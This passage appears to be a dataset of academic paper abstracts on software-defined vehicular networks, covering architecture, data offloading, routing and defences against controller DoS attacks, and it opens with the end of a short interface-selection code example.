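    print(cheapest_feasible_interface(size_mb=2.0, deadline_ms=100))  # prefers free DSRC
    print(cheapest_feasible_interface(size_mb=2.0, deadline_ms=30))   # forced onto LTE
```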
--- paper_title: Vehicle Software Updates Distribution with SDN and Cloud Computing paper_content: Vehicles have embedded software dedicated to diverse functionality ranging from driving assistance to entertainment. Vehicle manufacturers often need to perform updates on software installed on vehicles. Software updates can either be pushed by the manufacturer to install fixes, or be requested by vehicle owners to upgrade some functionality. We propose an architecture for distributing software updates on vehicles based on SDN and cloud computing. We show that using SDN, the emergent networking paradigm, which provides on-demand network programmability, adds substantial flexibility for deploying software updates on vehicles. We propose solutions for how vehicular networks can be modeled as connectivity graphs that can be used as input for the SDN architecture. After constructing graphs, we present an SDN-based solution where different frequency bands are assigned to different graph edges to improve the network performance. --- paper_title: SDVN: enabling rapid network innovation for heterogeneous vehicular communication paper_content: With the advances in telecommunications, more and more devices are connected to the Internet and getting smart. As a promising application scenario for carrier networks, vehicular communication has enabled many traffic-related applications. However, the heterogeneity of wireless infrastructures and the inflexibility in protocol deployment hinder the real world application of vehicular communications. SDN is promising to bridge the gaps through unified network abstraction and programmability. In this research, we propose an SDN-based architecture to enable rapid network innovation for vehicular communications. Under this architecture, heterogeneous wireless devices, including vehicles and roadside units, are abstracted as SDN switches with a unified interface. In addition, network resources such as bandwidth and spectrum can also be allocated and assigned by the logically centralized control plane, which provides a far more agile configuration capability. Besides, we also study several cases to highlight the advantages of the architecture, such as adaptive protocol deployment and multiple tenants isolation. Finally, the feasibility and effectiveness of the proposed architecture and cases are validated through traffic-trace-based simulation. --- paper_title: Data Offloading in 5G-Enabled Software-Defined Vehicular Networks: A Stackelberg-Game-Based Approach paper_content: Data offloading using vehicles is one of the most challenging tasks to perform due to the high mobility of vehicles. There are many solutions available for this purpose, but due to the inefficient management of data along with the control decisions, these solutions are not adequate to provide data offloading by making use of the available networks. Moreover, with the advent of 5G and related technologies, there is a need to cope with high speed and traffic congestion in the existing infrastructure used for data offloading. Hence, to make intelligent decisions for data offloading, an SDN-based scheme is presented in this article. In the proposed scheme, an SDNbased controller is designed that makes decisions for data offloading by using the priority manager and load balancer. Using these two managers in SDN-based controllers, traffic routing is managed efficiently even with an increase in the size of the network. 
Moreover, a single-leader multi-follower Stackelberg game for network selection is also used for data offloading. The proposed scheme is evaluated with respect to several parameters where its performance was found to be superior in comparison to the existing schemes. --- paper_title: Link Stability Based Optimized Routing Framework for Software Defined Vehicular Networks paper_content: The dynamic nature of vehicular networks imposes a lot of challenges in multihop data transmission as links are vulnerable in their existence due to associated mobility of vehicles. Thus, packets frequently find it difficult to get through to the destination due to the limited lifetimes of links. The conventional broadcasting based vehicular ad-hoc network (VANET) routing protocols struggle to accurately analyze the link dynamicity due to the unavailability of global information and inefficiencies in their route discovering schemes. However, with the recently emerged software defined vehicular network (SDVN) paradigm, link stability can be better scrutinized pertaining to the availability of global network information. Thus, in this paper, we introduce an optimization based novel packet routing scheme with a source routing based flow instantiation (FI) operation for SDVN. The routing framework closely analyzes the stability of links in selecting the routes and the problem is formulated as a minimum cost capacitated flow problem. Furthermore, an incremental packet allocation scheme is proposed to solve the routing problem with lower time complexity. The objective is to find multiple shortest paths which are collectively stable enough to deliver a given number of packets. The FI scheme efficiently delivers and caches flow information in the required nodes with a reduced extent of communication with the control plane. With the help of realistic simulation, we show that the proposed routing framework excels in terms of the performance over the existing routing schemes of both SDVN and conventional VANET. --- paper_title: Multi-level SDN with vehicles as fog computing infrastructures: A new integrated architecture for 5G-VANETs paper_content: The spectacular emergence of connected and autonomous vehicles coupled with their evergrowing demands on processing, computation and communication resources pose new challenges to provide reliable vehicular services. Here, a combination of a multi-level SdN Approach and a foG computing architEcture based on Vehicles as Infrastructures paradigm, called VISAGE, is proposed for future 5G-VANET systems. By using vehicles as fog infrastructures and integrating them with local SDN controllers, the QoS of vehicular applications and protocols becomes more efficient in terms of computation time and communication delays. This is explained by offloading the computing services from the cloud to the edge of networks, making use of the abundant resources offered by vehicles and making network control decisions locally. Through three typical use cases of our proposed 5G era vehicular architecture, we show the promising benefits of our approach in terms of communication and computation capacities. --- paper_title: Software defined networking-based vehicular Adhoc Network with Fog Computing paper_content: Vehicular Adhoc Networks (VANETs) have attracted a lot of research in recent years.
Although VANETs are deployed in reality offering several services, the current architecture has been facing many difficulties in deployment and management because of poor connectivity, less scalability, less flexibility and less intelligence. We propose a new VANET architecture called FSDN which combines two emergent computing and network paradigms, Software Defined Networking (SDN) and Fog Computing, as a prospective solution. SDN-based architecture provides flexibility, scalability, programmability and global knowledge while Fog Computing offers delay-sensitive and location-aware services which could satisfy the demands of future VANET scenarios. We figure out all the SDN-based VANET components as well as their functionality in the system. We also consider the system basic operations in which Fog Computing is leveraged to support surveillance services by taking into account resource manager and Fog orchestration models. The proposed architecture could resolve the main challenges in VANETs by augmenting Vehicle-to-Vehicle (V2V), Vehicle-to-Infrastructure (V2I), Vehicle-to-Base Station communications and SDN centralized control while optimizing resources utility and reducing latency by integrating Fog Computing. Two use-cases for non-safety service (data streaming) and safety service (Lane-change assistance) are also presented to illustrate the benefits of our proposed architecture. --- paper_title: A Scalable and Quick-Response Software Defined Vehicular Network Assisted by Mobile Edge Computing paper_content: Connected vehicles provide advanced transformations and attractive business opportunities in the automotive industry. Presently, IEEE 802.11p and evolving 5G are the mainstream radio access technologies in the vehicular industry, but neither of them can meet all requirements of vehicle communication. In order to provide low-latency and high-reliability communication, an SDN-enabled network architecture assisted by MEC, which integrates different types of access technologies, is proposed. MEC technology with its on-premises feature can decrease data transmission time and enhance quality of user experience in latency-sensitive applications. Therefore, MEC plays as important a role in the proposed architecture as SDN technology. The proposed architecture was validated by a practical use case, and the obtained results have shown that it meets application-specific requirements and maintains good scalability and responsiveness. --- paper_title: V2V Data Offloading for Cellular Network Based on the Software Defined Network (SDN) Inside Mobile Edge Computing (MEC) Architecture paper_content: Data offloading plays an important role for the mobile data explosion problem that occurs in cellular networks. This paper proposed an idea and control scheme for offloading vehicular communication traffic in the cellular network to vehicle to vehicle (V2V) paths that can exist in vehicular ad hoc networks (VANETs). A software-defined network (SDN) inside the mobile edge computing (MEC) architecture, which is abbreviated as the SDNi-MEC server, is devised in this paper to tackle the complicated issues of VANET V2V offloading. Using the proposed SDNi-MEC architecture, each vehicle reports its contextual information to the context database of the SDNi-MEC server, and the SDN controller of the SDNi-MEC server calculates whether there is a V2V path between the two vehicles that are currently communicating with each other through the cellular network.
This proposed method: 1) uses each vehicle’s context; 2) adopts a centralized management strategy for calculation and notification; and 3) tries to establish a VANET routing path for paired vehicles that are currently communicating with each other using a cellular network. The performance analysis for the proposed offloading control scheme based on the SDNi-MEC server architecture shows that it has better throughput in both the cellular networking link and the V2V paths when the vehicle’s density is in the middle. --- paper_title: SDN VANETs in 5G: An architecture for resilient security services paper_content: Vehicular ad-Hoc Networks (VANETs) have been promoted as a key technology that can provide a wide variety of services such as traffic management, passenger safety, as well as travel convenience and comfort. VANETs are now proposed to be part of the upcoming Fifth Generation (5G) technology, integrated with Software Defined Networking (SDN), as key enabler of 5G. The technology of fog computing in 5G turned out to be an adequate solution for faster processing in delay sensitive application, such as VANETs, being a hybrid solution between fully centralized and fully distributed networks. In this paper, we propose a three-way integration between VANETs, SDN, and 5G for a resilient VANET security design approach, which strikes a good balance between network, mobility, performance and security features. We show how such an approach can secure VANETs from different types of attacks such as Distributed Denial of Service (DDoS) targeting either the controllers or the vehicles in the network, and how to trace back the source of the attack. Our evaluation shows the capability of the proposed system to enforce different levels of real-time user-defined security, while maintaining low overhead and minimal configuration. --- paper_title: Control Plane Optimization in Software-Defined Vehicular Ad Hoc Networks paper_content: The vehicle ad hoc network (VANET) is an emerging network technology that is expected to be cost-effective and adaptable, making it ideal to provide network connection service to drivers and passengers on today's roads. In the next generation of VANETs with fifth-generation (5G) networks, software-defined networking (SDN) technology will play a very important role in network management. However, for infotainment applications, high latency in VANET communication imposes a great challenge for network management, whereas direct communication through the cellular networks brings high cost. In this paper, we present an optimizing strategy to balance the latency requirement and the cost on cellular networks, in which we encourage vehicles to send the SDN control requests through the cellular networks by rebating network bandwidth. Furthermore, we model the interaction of the controller and vehicles as a two-stage Stackelberg game and analyze the game equilibrium. From the experimental results, the optimal rebating strategy provides smaller latency than other control plane structures. --- paper_title: A Software Defined Network architecture for GeoBroadcast in VANETs paper_content: This paper proposes a Software Defined Network (SDN) architecture for GeoBroadcast in VANETs. We have implemented a component to automatically manage the geographical location of Road Side Units (RSUs), which are used as a basis for our GeoBroadcast routing. 
GeoBroadcast in a vehicular network supports periodic broadcast messages from a source vehicle to the destination vehicles that are located in a specific geographical region. In existing Intelligent Transport Systems (ITS), the GeoBroadcast mechanism can be implemented using traditional IP networking. Typically, every periodic warning message received at the nearest RSU from the source must be routed to the control center in ITS, where it is redirected to every other RSU that is located in the destination geographical region for broadcasting. As a result, huge overhead in the control center is produced and higher network bandwidth is consumed. However, in our SDN based GeoBroadcast mechanism, the first warning message received by the source RSU is sent to the SDN controller as a packet-in message. The SDN controller will decode the packet-in message and use topological and geographical information to set up the routing paths to the destination RSUs, by installing appropriate flow entries on the corresponding RSUs and intermediate switches, for the following periodic warning messages that are to be broadcasted. As per our simulation with OpenNet, significant reductions of 84% in controller overhead, 60% in network bandwidth consumption, and 81% in latency are achieved. --- paper_title: Security and Privacy Issues in Vehicular Named Data Networks: An Overview paper_content: A tremendous amount of content and information are exchanged in a vehicular environment between vehicles, roadside units, and the Internet. This information aims to improve the driving experience and human safety. Due to the VANET’s properties and application characteristics, the security becomes an essential aspect and a more challenging task. On the contrary, named data networking has been proposed as a future Internet architecture that may improve the network performance, enhance content access and dissemination, and decrease the communication delay. NDN uses a clean design based on content names and Interest-Data exchange model. In this paper, we focus on the vehicular named data networking environment, targeting the security attacks and privacy issues. We present a state of the art of existing VANET attacks and how NDN can deal with them. We classified these attacks based on the NDN perspective. Furthermore, we define various challenges and issues faced by NDN-based VANET and highlight future research directions that should be addressed by the research community. --- paper_title: QoE-Based Flow Management in Software Defined Vehicular Networks paper_content: In vehicular networks, high mobility and limited transmission range of Road-Side Units (RSU) cause dynamic topological changes and result in interference caused by the transmissions of vehicles. Moreover, due to the limited bandwidth of IEEE 802.11p based vehicular communication, providing a fair share of network resources among vehicles is essential for an efficient network management. Therefore, flow and interference management challenges cause a degradation in the percentage of satisfied flows by affecting the quality of communication and increasing interference in vehicular networks. These aforementioned two challenges can be mitigated with the Software-Defined Networking (SDN) paradigm where a centralized controller can schedule data flows and then coordinate power level of vehicles. Hence, in this paper, the cooperation of SDN and IEEE 802.11p based vehicular communication has been proposed in vehicular networks.
We present a novel software-defined flow and power management model implemented in the controller. Here, we classify vehicles based on Quality of Experience (QoE) and model RSUs with a queuing theoretic approach. Then the proposed model is used to detect unsatisfactory vehicles and estimate an effective and accurate amount of transmission power for these vehicles so that unsatisfactory vehicles will be served by a newly assigned RSU with an optimal signal level. Moreover, we redefine the flow label field in the OpenFlow flow table so that the controller can manage RSUs by imposing certain behaviors. Numerical results show how a higher percentage of satisfied flows can be maintained by implementing this idea. --- paper_title: Toward Secure Software Defined Vehicular Networks: Taxonomy, Requirements, and Open Issues paper_content: The emerging software defined vehicular networking (SDVN) paradigm promises to dramatically simplify network management and enable innovation through network programmability. Despite noticeable advances of SDNs in wired networks, it is also becoming an indispensable component that potentially provides flexible and well managed next-generation wireless networks, gaining massive attention from both industry and academia. In spite of all the hype surrounding emerging SDVNs, exploiting its full potential is demanding, and security is still the key concern and an equally arresting challenge. On the contrary, the complete transformation of the network into an SDN structure is still questionable, and the security and dependability of SDNs have largely been neglected topics. Moreover, the logical centralization of network intelligence and the tremendously evolving landscape of digital threats and cyber attacks that predominantly target emerging SDVNs will have even more devastating effects than they are in simple networks. Besides, the deployment of the SDVNs' novel entities and several architectural components drive new security threats and vulnerabilities. Since the SDVNs architectural layers and their corresponding APIs are heavily dependent on each other, this article aims to present a systematic top-down approach to tackle the potential security vulnerabilities, attacks, and challenges pertaining to each layer. The article contributes by presenting the security implications of the emerging SDVNs to devise comprehensive thematic core layered taxonomies together with external communication APIs. Moreover, we also describe the potential requirements and key enablers toward secure SDVNs. Finally, a plethora of open security research issues are presented that may be deemed appropriate for young researchers and professionals around the globe to tackle in anticipation of secure SDVNs. --- paper_title: Enabling SDN in VANETs: What is the Impact on Security? paper_content: The demand for safe and secure journeys over roads and highways has been growing at a tremendous pace over recent decades. At the same time, the smart city paradigm has emerged to improve citizens' quality of life by developing the smart mobility concept. Vehicular Ad hoc NETworks (VANETs) are widely recognized to be instrumental in realizing such concept, by enabling appealing safety and infotainment services. Such networks come with their own set of challenges, which range from managing high node mobility to securing data and user privacy.
The Software Defined Networking (SDN) paradigm has been identified as a suitable solution for dealing with the dynamic network environment, the increased number of connected devices, and the heterogeneity of applications. While some preliminary investigations have been already conducted to check the applicability of the SDN paradigm to VANETs, and its presumed benefits for managing resources and mobility, it is still unclear what impact SDN will have on security and privacy. Security is a relevant issue in VANETs, because of the impact that threats can have on drivers' behavior and quality of life. This paper opens a discussion on the security threats that future SDN-enabled VANETs will have to face, and investigates how SDN could be beneficial in building new countermeasures. The analysis is conducted in real use cases (smart parking, smart grid of electric vehicles, platooning, and emergency services), which are expected to be among the vehicular applications that will most benefit from introducing an SDN architecture. --- paper_title: Software defined networking-based vehicular Adhoc Network with Fog Computing paper_content: Vehicular Adhoc Networks (VANETs) have been attracted a lot of research recent years. Although VANETs are deployed in reality offering several services, the current architecture has been facing many difficulties in deployment and management because of poor connectivity, less scalability, less flexibility and less intelligence. We propose a new VANET architecture called FSDN which combines two emergent computing and network paradigm Software Defined Networking (SDN) and Fog Computing as a prospective solution. SDN-based architecture provides flexibility, scalability, programmability and global knowledge while Fog Computing offers delay-sensitive and location-awareness services which could be satisfy the demands of future VANETs scenarios. We figure out all the SDN-based VANET components as well as their functionality in the system. We also consider the system basic operations in which Fog Computing are leveraged to support surveillance services by taking into account resource manager and Fog orchestration models. The proposed architecture could resolve the main challenges in VANETs by augmenting Vehicle-to-Vehicle (V2V), Vehicle-to-Infrastructure (V2I), Vehicle-to-Base Station communications and SDN centralized control while optimizing resources utility and reducing latency by integrating Fog Computing. Two use-cases for non-safety service (data streaming) and safety service (Lane-change assistance) are also presented to illustrate the benefits of our proposed architecture. --- paper_title: A Buffer-Aware QoS Streaming Approach for SDN-Enabled 5G Vehicular Networks paper_content: With the progress of network technology in recent years, multimedia streaming applications have become increasingly popular. However, it is difficult to achieve quality of service and efficiency for multimedia streaming over vehicular networks because of the high mobility feature. Over the existing network architecture, it is difficult to immediately analyze the status of the entire network, and then establish the rules of allocation and management. However, the novel network architecture, software-defined networking, offers other options for making network management more efficient, especially for the 5G network environment. 
Hence, a buffer-aware streaming approach is proposed to allow users to play multimedia streaming over vehicular 5G networks, in the case of handover between different eNodeBs, to achieve minimum delay and have better quality of service. According to the user's mobility information, the status of the player buffer, and the current strength of the network signal, the proposed approach can provide the transmission strategy of multimedia streaming to the SDN controller. Finally, the experimental results proved that the proposed approach is able to not only adjust the priority of streaming content segments with the buffer and mobility status of user equipment to effectively retain overall streaming services quality, but also avoid the delay of streaming content transmission for 5G vehicular networks. --- paper_title: FloodGuard: A DoS Attack Prevention Extension in Software-Defined Networks paper_content: This paper addresses one serious SDN-specific attack, i.e., data-to-control plane saturation attack, which overloads the infrastructure of SDN networks. In this attack, an attacker can produce a large amount of table-miss packet_in messages to consume resources in both control plane and data plane. To mitigate this security threat, we introduce an efficient, lightweight and protocol-independent defense framework for SDN networks. Our solution, called FloodGuard, contains two new techniques/modules: proactive flow rule analyzer and packet migration. To preserve network policy enforcement, proactive flow rule analyzer dynamically derives proactive flow rules by reasoning the runtime logic of the SDN/OpenFlow controller and its applications. To protect the controller from being overloaded, packet migration temporarily caches the flooding packets and submits them to the OpenFlow controller using rate limit and round-robin scheduling. We evaluate FloodGuard through a prototype implementation tested in both software and hardware environments. The results show that FloodGuard is effective with adding only minor overhead into the entire SDN/OpenFlow infrastructure. --- paper_title: 5G next generation VANETs using SDN and fog computing framework paper_content: The growth of technical revolution towards 5G Next generation networks is expected to meet various communication requirements of future Intelligent Transportation Systems (ITS). Motivated by the consumer needs for variety of ITS applications, bandwidth, high speed and ubiquity, researches are currently exploring different network architectures and techniques, which could be employed in Next generation ITS. To provide flexible network management, control and high resource utilization in Vehicular Ad-hoc Networks (VANETs) on large scale, a new hierarchical 5G Next generation VANET architecture is proposed. The key idea of this holistic architecture is to integrate the centralization and flexibility of Software Defined Networking (SDN) and Cloud-RAN (CRAN), with 5G communication technologies, to effectively allocate resources with a global view. Moreover, a fog computing framework (comprising of zones and clusters) has been proposed at the edge, to avoid frequent handovers between vehicles and RSUs. The transmission delay, throughput and control overhead on controller are analyzed and compared with other architectures. Simulation results indicate reduced transmission delay and minimized control overhead on controllers. Moreover, the throughput of proposed system is also improved. 
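FloodGuard, cited above, couples a proactive flow-rule analyzer with a packet-migration module that caches table-miss packets and submits them to the controller under rate limiting and round-robin scheduling. The toy model below illustrates only the caching-and-draining idea; the per-tick budget, class names, and data structures are assumptions and not FloodGuard's implementation.

```python
import collections
import itertools

# Toy model of packet migration: buffer table-miss packets per switch and drain
# them toward the controller round-robin under a global rate limit.
CONTROLLER_BUDGET_PER_TICK = 3  # packet_in messages the controller accepts per tick

class PacketMigrationBuffer:
    def __init__(self):
        self.queues = collections.defaultdict(collections.deque)

    def cache(self, switch_id, packet):
        """Called on a table-miss instead of sending packet_in immediately."""
        self.queues[switch_id].append(packet)

    def drain(self):
        """Release up to the per-tick budget, visiting switches round-robin."""
        released = []
        for switch_id in itertools.cycle(list(self.queues)):
            if len(released) >= CONTROLLER_BUDGET_PER_TICK:
                break
            if self.queues[switch_id]:
                released.append((switch_id, self.queues[switch_id].popleft()))
            if not any(self.queues.values()):
                break
        return released

if __name__ == "__main__":
    buf = PacketMigrationBuffer()
    for i in range(5):
        buf.cache("s1", f"flood-{i}")   # a bursty, possibly malicious source
    buf.cache("s2", "legitimate-flow")
    print(buf.drain())  # s2 gets a share of the budget despite the s1 burst
```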
--- paper_title: An Architecture for Hierarchical Software-Defined Vehicular Networks paper_content: With the recent advances in the telecommunications and auto industries, we have witnessed growing interest in ITS, of which VANETs are an essential component. SDN can bring advantages to ITS through its ability to provide flexibility and programmability to networks through a logically centralized controller entity that has a comprehensive view of the network. However, as the SDN paradigm initially had fixed networks in mind, adapting it to work on VANETs requires some changes to address particular characteristics of this kind of scenario, such as the high mobility of its nodes. There has been initial work on bringing SDN concepts to vehicular networks to expand its abilities to provide applications and services through the increased flexibility, but most of these studies do not directly tackle the issue of loss of connectivity with said controller entity. In this article, we propose a hierarchical SDN-based vehicular architecture that aims to have improved performance in the situation of loss of connection with the central SDN controller. Simulation results show that our proposal outperforms traditional routing protocols in the scenario where there is no coordination from the central SDN controller. --- paper_title: Towards software-defined VANET: Architecture and services paper_content: Vehicular Ad Hoc Networks (VANETs) have in recent years been viewed as one of the enabling technologies to provide a wide variety of services, such as vehicle road safety, enhanced traffic and travel efficiency, and convenience and comfort for passengers and drivers. However, current VANET architectures lack in flexibility and make the deployment of services/protocols in large-scale a hard task. In this paper, we demonstrate how Software-Defined Networking (SDN), an emerging network paradigm, can be used to provide the flexibility and programmability to networks and introduces new services and features to today's VANETs. We take the concept of SDN, which has mainly been designed for wired infrastructures, especially in the data center space, and propose SDN-based VANET architecture and its operational mode to adapt SDN to VANET environments. We also discuss benefits of a Software-Defined VANET and the services that can be provided. We demonstrate in simulation the feasibility of a Software-Defined VANET by comparing SDN-based routing with traditional MANET/VANET routing protocols. We also show in simulation fallback mechanisms that must be provided to apply the SDN concept into mobile wireless scenarios, and demonstrate one of the possible services that can be provided by a Software-Defined VANET. --- paper_title: LineSwitch: Tackling Control Plane Saturation Attacks in Software-Defined Networking paper_content: Software defined networking (SDN) is a new networking paradigm that in recent years has revolutionized network architectures. At its core, SDN separates the data plane, which provides data forwarding functionalities, and the control plane, which implements the network control logic. The separation of these two components provides a virtually centralized point of control in the network, and at the same time abstracts the complexity of the underlying physical infrastructure. Unfortunately, while promising, the SDN approach also introduces new attacks and vulnerabilities. 
Indeed, previous research shows that, under certain traffic conditions, the required communication between the control and data plane can result in a bottleneck. An attacker can exploit this limitation to mount a new, network-wide, type of denial of service attack, known as the control plane saturation attack . This paper presents LineSwitch, an efficient and effective data plane solution to tackle the control plane saturation attack. LineSwitch employs probabilistic proxying and blacklisting of network traffic to prevent the attack from reaching the control plane, and thus preserve network functionality. We implemented LineSwitch as an extension of the reference SDN implementation, OpenFlow, and run a thorough set of experiments under different traffic and attack scenarios. We compared LineSwitch to the state of the art, and we show that it provides at the same time, the same level of protection against the control plane saturation attack, and a reduced time overhead by up to 30%. --- paper_title: SDVN: enabling rapid network innovation for heterogeneous vehicular communication paper_content: With the advances in telecommunications, more and more devices are connected to the Internet and getting smart. As a promising application scenario for carrier networks, vehicular communication has enabled many traffic-related applications. However, the heterogeneity of wireless infrastructures and the inflexibility in protocol deployment hinder the real world application of vehicular communications. SDN is promising to bridge the gaps through unified network abstraction and programmability. In this research, we propose an SDN-based architecture to enable rapid network innovation for vehicular communications. Under this architecture, heterogeneous wireless devices, including vehicles and roadside units, are abstracted as SDN switches with a unified interface. In addition, network resources such as bandwidth and spectrum can also be allocated and assigned by the logically centralized control plane, which provides a far more agile configuration capability. Besides, we also study several cases to highlight the advantages of the architecture, such as adaptive protocol deployment and multiple tenants isolation. Finally, the feasibility and effectiveness of the proposed architecture and cases are validated through traffic-trace-based simulation. --- paper_title: FlowRanger: A request prioritizing algorithm for controller DoS attacks in Software Defined Networks paper_content: Software Defined Networking (SDN) introduces a new communication network management paradigm and has gained much attention from academia and industry. However, the centralized nature of SDN is a potential vulnerability to the system since attackers may launch denial of services (DoS) attacks against the controller. Existing solutions limit requests rate to the controller by dropping overflowed requests, but they also drop legitimate requests to the controller. To address this problem, we propose FlowRanger, a buffer prioritizing solution for controllers to handle routing requests based on their likelihood to be attacking requests, which derives the trust values of the requesting sources. Based on their trust values, FlowRanger classifies routing requests into multiple buffer queues with different priorities. Thus, attacking requests are served with a lower priority than regular requests. 
Our simulation results demonstrate that FlowRanger can significantly enhance the request serving rate of regular users under DoS attacks against the controller. To the best of our knowledge, our work is the first solution to battle against controller DoS attacks on the controller side. --- paper_title: SDN VANETs in 5G: An architecture for resilient security services paper_content: Vehicular ad-Hoc Networks (VANETs) have been promoted as a key technology that can provide a wide variety of services such as traffic management, passenger safety, as well as travel convenience and comfort. VANETs are now proposed to be part of the upcoming Fifth Generation (5G) technology, integrated with Software Defined Networking (SDN), as a key enabler of 5G. The technology of fog computing in 5G turned out to be an adequate solution for faster processing in delay-sensitive applications, such as VANETs, being a hybrid solution between fully centralized and fully distributed networks. In this paper, we propose a three-way integration between VANETs, SDN, and 5G for a resilient VANET security design approach, which strikes a good balance between network, mobility, performance and security features. We show how such an approach can secure VANETs from different types of attacks such as Distributed Denial of Service (DDoS) targeting either the controllers or the vehicles in the network, and how to trace back the source of the attack. Our evaluation shows the capability of the proposed system to enforce different levels of real-time user-defined security, while maintaining low overhead and minimal configuration. --- paper_title: Topology Discovery in Software Defined Networks: Threats, Taxonomy, and State-of-the-Art paper_content: The fundamental role of the software defined networks (SDNs) is to decouple the data plane from the control plane, thus providing a logically centralized visibility of the entire network to the controller. This enables the applications to innovate through network programmability. To establish a centralized visibility, a controller is required to discover a network topology of the entire SDN infrastructure. However, discovering a network topology is challenging due to: 1) the frequent migration of the virtual machines in the data centers; 2) lack of authentication mechanisms; 3) scarcity of the SDN standards; and 4) integration of security mechanisms for the topology discovery. To this end, in this paper, we present a comprehensive survey of the topology discovery and the associated security implications in SDNs. This survey provides discussions related to the possible threats relevant to each layer of the SDN architecture, highlights the role of the topology discovery in the traditional network and SDN, presents a thematic taxonomy of topology discovery in SDN, and provides insights into the potential threats to the topology discovery along with its state-of-the-art solutions in SDN. Finally, this survey also presents future challenges and research directions in the field of SDN topology discovery. --- paper_title: An Architecture for Hierarchical Software-Defined Vehicular Networks paper_content: With the recent advances in the telecommunications and auto industries, we have witnessed growing interest in ITS, of which VANETs are an essential component. SDN can bring advantages to ITS through its ability to provide flexibility and programmability to networks through a logically centralized controller entity that has a comprehensive view of the network.
However, as the SDN paradigm initially had fixed networks in mind, adapting it to work on VANETs requires some changes to address particular characteristics of this kind of scenario, such as the high mobility of its nodes. There has been initial work on bringing SDN concepts to vehicular networks to expand its abilities to provide applications and services through the increased flexibility, but most of these studies do not directly tackle the issue of loss of connectivity with said controller entity. In this article, we propose a hierarchical SDN-based vehicular architecture that aims to have improved performance in the situation of loss of connection with the central SDN controller. Simulation results show that our proposal outperforms traditional routing protocols in the scenario where there is no coordination from the central SDN controller. --- paper_title: Towards software-defined VANET: Architecture and services paper_content: Vehicular Ad Hoc Networks (VANETs) have in recent years been viewed as one of the enabling technologies to provide a wide variety of services, such as vehicle road safety, enhanced traffic and travel efficiency, and convenience and comfort for passengers and drivers. However, current VANET architectures lack flexibility and make the large-scale deployment of services/protocols a hard task. In this paper, we demonstrate how Software-Defined Networking (SDN), an emerging network paradigm, can be used to provide flexibility and programmability to networks and to introduce new services and features to today's VANETs. We take the concept of SDN, which has mainly been designed for wired infrastructures, especially in the data center space, and propose an SDN-based VANET architecture and its operational mode to adapt SDN to VANET environments. We also discuss benefits of a Software-Defined VANET and the services that can be provided. We demonstrate in simulation the feasibility of a Software-Defined VANET by comparing SDN-based routing with traditional MANET/VANET routing protocols. We also show in simulation fallback mechanisms that must be provided to apply the SDN concept into mobile wireless scenarios, and demonstrate one of the possible services that can be provided by a Software-Defined VANET. --- paper_title: Cost-Efficient Sensory Data Transmission in Heterogeneous Software-Defined Vehicular Networks paper_content: Sensing and networking have been regarded as key enabling technologies of future smart vehicles. Sensing allows vehicles to be context aware, while networking empowers context sharing among ambients. Existing vehicular communication solutions mainly rely on homogeneous networks, or heterogeneous networks via data offloading. However, today’s vehicular network implementations are highly heterogeneous. Therefore, conventional homogeneous communication and data offloading may not be able to satisfy the requirements of the emerging vehicular networking applications. In this paper, we apply the software-defined network (SDN) to the heterogeneous vehicular networks to bridge the gaps. With SDN, heterogeneous network resources can be managed with a unified abstraction. Moreover, we propose an SDN-based wireless communication solution, which can schedule different network resources to minimize communication cost. We investigate the problems in both single and multiple hop cases. We also evaluate the proposed approaches using traffic traces. The effectiveness and the efficiency are validated by the results.
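To make the cost-minimizing scheduling idea in the entry above concrete, the following is a minimal, illustrative Python sketch and is not taken from the cited paper: a controller greedily assigns each sensory flow to the cheapest heterogeneous link that still has spare capacity. The link names, costs, capacities, and flow sizes are hypothetical placeholders.

```python
# Illustrative sketch (hypothetical data): greedy, cost-aware assignment of
# sensory flows to heterogeneous links (e.g., DSRC vs. cellular) by a controller.
from dataclasses import dataclass

@dataclass
class Link:
    name: str
    cost_per_mb: float   # monetary or energy cost per megabyte
    capacity_mb: float   # remaining capacity in this scheduling window

def assign_flows(flows, links):
    """Assign each (flow_id, size_mb) to the cheapest link with spare capacity."""
    assignment = {}
    for flow_id, size_mb in sorted(flows, key=lambda f: -f[1]):  # largest flows first
        candidates = [l for l in links if l.capacity_mb >= size_mb]
        if not candidates:
            assignment[flow_id] = None          # no feasible link; defer this flow
            continue
        best = min(candidates, key=lambda l: l.cost_per_mb)
        best.capacity_mb -= size_mb
        assignment[flow_id] = best.name
    return assignment

if __name__ == "__main__":
    links = [Link("DSRC", cost_per_mb=0.0, capacity_mb=20.0),
             Link("LTE", cost_per_mb=0.05, capacity_mb=100.0)]
    flows = [("cam_video", 30.0), ("lidar_summary", 8.0), ("beacon_batch", 2.0)]
    print(assign_flows(flows, links))
```

A real scheduler would also account for delay constraints and multi-hop relaying, which the cited work formulates as an optimization problem; the greedy rule here only illustrates the single-hop, cost-only case.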
--- paper_title: SDVN: enabling rapid network innovation for heterogeneous vehicular communication paper_content: With the advances in telecommunications, more and more devices are connected to the Internet and getting smart. As a promising application scenario for carrier networks, vehicular communication has enabled many traffic-related applications. However, the heterogeneity of wireless infrastructures and the inflexibility in protocol deployment hinder the real world application of vehicular communications. SDN is promising to bridge the gaps through unified network abstraction and programmability. In this research, we propose an SDN-based architecture to enable rapid network innovation for vehicular communications. Under this architecture, heterogeneous wireless devices, including vehicles and roadside units, are abstracted as SDN switches with a unified interface. In addition, network resources such as bandwidth and spectrum can also be allocated and assigned by the logically centralized control plane, which provides a far more agile configuration capability. Besides, we also study several cases to highlight the advantages of the architecture, such as adaptive protocol deployment and multiple tenants isolation. Finally, the feasibility and effectiveness of the proposed architecture and cases are validated through traffic-trace-based simulation. --- paper_title: Data Offloading in 5G-Enabled Software-Defined Vehicular Networks: A Stackelberg-Game-Based Approach paper_content: Data offloading using vehicles is one of the most challenging tasks to perform due to the high mobility of vehicles. There are many solutions available for this purpose, but due to the inefficient management of data along with the control decisions, these solutions are not adequate to provide data offloading by making use of the available networks. Moreover, with the advent of 5G and related technologies, there is a need to cope with high speed and traffic congestion in the existing infrastructure used for data offloading. Hence, to make intelligent decisions for data offloading, an SDN-based scheme is presented in this article. In the proposed scheme, an SDN-based controller is designed that makes decisions for data offloading by using the priority manager and load balancer. Using these two managers in SDN-based controllers, traffic routing is managed efficiently even with an increase in the size of the network. Moreover, a single-leader multi-follower Stackelberg game for network selection is also used for data offloading. The proposed scheme is evaluated with respect to several parameters where its performance was found to be superior in comparison to the existing schemes. --- paper_title: Multi-level SDN with vehicles as fog computing infrastructures: A new integrated architecture for 5G-VANETs paper_content: The spectacular emergence of connected and autonomous vehicles coupled with their ever-growing demands on processing, computation and communication resources pose new challenges to provide reliable vehicular services. Here, a combination of a multi-level SdN Approach and a foG computing architEcture based on Vehicles as Infrastructures paradigm, called VISAGE, is proposed for 